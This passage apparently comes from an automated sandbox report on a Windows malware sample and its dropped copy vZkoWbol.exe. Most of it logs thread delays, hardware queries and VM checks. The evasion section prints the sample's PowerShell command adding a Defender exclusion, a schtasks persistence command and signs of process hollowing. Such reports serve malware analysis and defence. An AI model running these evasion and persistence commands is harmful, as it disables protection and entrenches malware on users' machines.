                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 299875
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 299766
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 299656
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 299547
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 299438
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 299313
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 299188
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 299063
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 298953
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 298844
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 298719
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 298610
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 298485
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 298360
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 298235
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 298110
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 297985
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 297860
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 297735
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 297610
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 297484
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 297375
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 297266
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 297156
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 297047
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 296937
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 296828
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 296719
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 296594
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 296484
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 296375
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 296266
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 296156
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 296047
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 295935
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 295828
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 295719
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Thread delayed: delay time: 295609
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 599876
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 599750
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 599641
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 599531
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 599422
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 599313
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 599202
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 599094
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 598984
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 598874
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 299988
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 299859
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 299750
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 299640
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 299531
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 299422
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 299311
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 299203
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 299093
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 298984
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 298871
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 298765
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 298656
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 298547
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 298437
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 298328
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 298218
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 298109
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 298000
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 297890
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 297781
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 297671
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 297562
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 297453
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 297330
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 297203
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 297093
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 296984
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 296875
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 296765
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 296656
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 296547
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 296437
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 296316
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 296187
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 296078
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 295968
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 295856
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Thread delayed: delay time: 295749
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe Window / User API: threadDelayed 396
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6034
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2591
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe Window / User API: threadDelayed 6801
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe Window / User API: threadDelayed 3036
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe Window / User API: threadDelayed 1649
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe Window / User API: threadDelayed 8213
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 1264 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5588 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe TID: 7200 Thread sleep time (each >= -30000s; 52 entries): -26747778906878833s, -600000s, -599890s, -599781s, -599671s, -599562s, -599438s, -599328s, -599219s, -599109s, -599000s, -598890s, -598781s, -300000s, -299875s, -299766s, -299656s, -299547s, -299438s, -299313s, -299188s, -299063s, -298953s, -298844s, -298719s, -298610s, -298485s, -298360s, -298235s, -298110s, -297985s, -297860s, -297735s, -297610s, -297484s, -297375s, -297266s, -297156s, -297047s, -296937s, -296828s, -296719s, -296594s, -296484s, -296375s, -296266s, -296156s, -296047s, -295935s, -295828s, -295719s, -295609s
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 3292 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe TID: 7440 Thread sleep time (each >= -30000s; 51 entries): -24903104499507879s, -600000s, -599876s, -599750s, -599641s, -599531s, -599422s, -599313s, -599202s, -599094s, -598984s, -598874s, -299988s, -299859s, -299750s, -299640s, -299531s, -299422s, -299311s, -299203s, -299093s, -298984s, -298871s, -298765s, -298656s, -298547s, -298437s, -298328s, -298218s, -298109s, -298000s, -297890s, -297781s, -297671s, -297562s, -297453s, -297330s, -297203s, -297093s, -296984s, -296875s, -296765s, -296656s, -296547s, -296437s, -296316s, -296187s, -296078s, -295968s, -295856s, -295749s
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (15 occurrences)
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (10 occurrences)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (2 occurrences)
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (2 occurrences)
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe Thread delayed: delay time (52 entries): 922337203685477, 600000, 599890, 599781, 599671, 599562, 599438, 599328, 599219, 599109, 599000, 598890, 598781, 300000, 299875, 299766, 299656, 299547, 299438, 299313, 299188, 299063, 298953, 298844, 298719, 298610, 298485, 298360, 298235, 298110, 297985, 297860, 297735, 297610, 297484, 297375, 297266, 297156, 297047, 296937, 296828, 296719, 296594, 296484, 296375, 296266, 296156, 296047, 295935, 295828, 295719, 295609
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe Thread delayed: delay time (51 entries): 922337203685477, 922337203685477, 600000, 599876, 599750, 599641, 599531, 599422, 599313, 599202, 599094, 598984, 598874, 299988, 299859, 299750, 299640, 299531, 299422, 299311, 299203, 299093, 298984, 298871, 298765, 298656, 298547, 298437, 298328, 298218, 298109, 298000, 297890, 297781, 297671, 297562, 297453, 297330, 297203, 297093, 296984, 296875, 296765, 296656, 296547, 296437, 296316, 296187, 296078, 295968, 295856
                      Source: C:\Users\user\AppData\Roaming\vZkoWbol.exeThread delayed: delay time: 295749
                      Source: vZkoWbol.exe, 00000007.00000002.2143441944.0000000009146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\=}v
                      Source: vZkoWbol.exe, 00000007.00000002.2143441944.0000000009132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
                      Source: vZkoWbol.exe, 00000007.00000002.2143441944.0000000009132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\-~b
                      Source: z1E-catalogSamples.exe, 00000006.00000002.4524319407.00000000012E3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
                      Source: vZkoWbol.exe, 0000000C.00000002.4539079433.0000000006560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\z1E-catalogSamples.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Memory written: C:\Users\user\Desktop\z1E-catalogSamples.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Memory written: C:\Users\user\AppData\Roaming\vZkoWbol.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmp9244.tmp"
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Process created: C:\Users\user\Desktop\z1E-catalogSamples.exe "C:\Users\user\Desktop\z1E-catalogSamples.exe"
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vZkoWbol" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D5.tmp"
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Process created: C:\Users\user\AppData\Roaming\vZkoWbol.exe "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Process created: C:\Users\user\AppData\Roaming\vZkoWbol.exe "C:\Users\user\AppData\Roaming\vZkoWbol.exe"
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Queries volume information: C:\Users\user\Desktop\z1E-catalogSamples.exe VolumeInformation
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Queries volume information: C:\Users\user\Desktop\z1E-catalogSamples.exe VolumeInformation
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\z1E-catalogSamples.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Queries volume information: C:\Users\user\AppData\Roaming\vZkoWbol.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Queries volume information: C:\Users\user\AppData\Roaming\vZkoWbol.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\vZkoWbol.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
